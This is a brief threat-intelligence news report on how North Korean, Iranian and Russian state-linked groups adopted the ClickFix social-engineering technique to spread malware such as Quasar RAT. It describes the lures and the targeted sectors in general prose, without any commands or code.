From late 2024 through early 2025, state-sponsored threat groups from North Korea, Iran, and Russia began using a social engineering technique known as ClickFix to distribute malware.

These campaigns were attributed to TA427 (Kimsuky), TA450 (MuddyWater), TA422 (APT28), and a lesser-known group dubbed UNK_RemoteRogue. ClickFix, once popular among cybercriminals, has proven so effective that it is now part of sophisticated nation-state malware operations. Rather than overhauling their tactics, threat actors are replacing traditional infection stages with ClickFix’s user-driven approach.

ClickFix lures victims into infecting their own systems by copying and running malicious code under the guise of completing security verifications or fixing technical issues. For instance, TA427 used spoofed meeting invitations to trick targets into visiting attacker-controlled websites, where they were instructed to execute PowerShell commands. This initiated a chain leading to the installation of Quasar RAT. Similarly, TA450 disguised its campaign as a Microsoft security alert timed with Patch Tuesday, directing victims to install legitimate-looking remote monitoring tools for surveillance and data theft.

These campaigns targeted sectors like defense, government, healthcare, and finance in regions including the Middle East, North America, and Europe. UNK_RemoteRogue leveraged compromised Zimbra servers to send fake emails containing links to PowerShell tutorials and scripts tied to the Empire C2 framework. The surge in ClickFix adoption by diverse state actors within a short period highlights its growing appeal. While not yet a standard tactic, it is likely we’ll see more threat groups testing or deploying ClickFix in the near future.